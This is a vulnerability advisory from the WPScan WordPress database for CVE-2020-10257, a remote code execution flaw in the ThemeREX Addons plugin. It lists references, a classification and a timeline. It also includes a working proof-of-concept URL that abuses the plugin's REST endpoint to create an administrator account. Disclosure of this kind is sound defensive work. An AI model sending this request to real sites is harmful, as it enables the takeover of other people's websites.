ThemeREX Addons - Remote Code Execution



Description
"This flaw allows attackers to remotely execute code on a site with the plugin installed, including the ability to execute code that can inject administrative user accounts."

Note (WPScanTeam): There are major version inconsistencies in the trx_addons shipped with the affected themes. As a result, a common the fixed in version can not be set so far and we would recommend to see the posts from ThemeRex and Wordfence in the references below for the versions.
Proof of Concept
https://[domain]/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=admin&user_pass=admin

Affects Plugin

no known fix

References

CVE 2020-10257
URL https://www.wordfence.com/blog/2020/02/zero-day-vulnerability-in-themerex-addons-plugin-exploited-in-the-wild
URL https://themerex.net/wp/themerex-addons-vulnerability-fixed/
URL https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Wordfence
Submitter Website https://wordfence.com
Submitter Twitter wordfence
Views 4500
Verified No
WPVDB ID 10076

Timeline

Publicly Published 2020-02-18 (about 1 month ago)
Added 2020-02-18 (about 1 month ago)
Last Updated 2020-03-12 (22 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin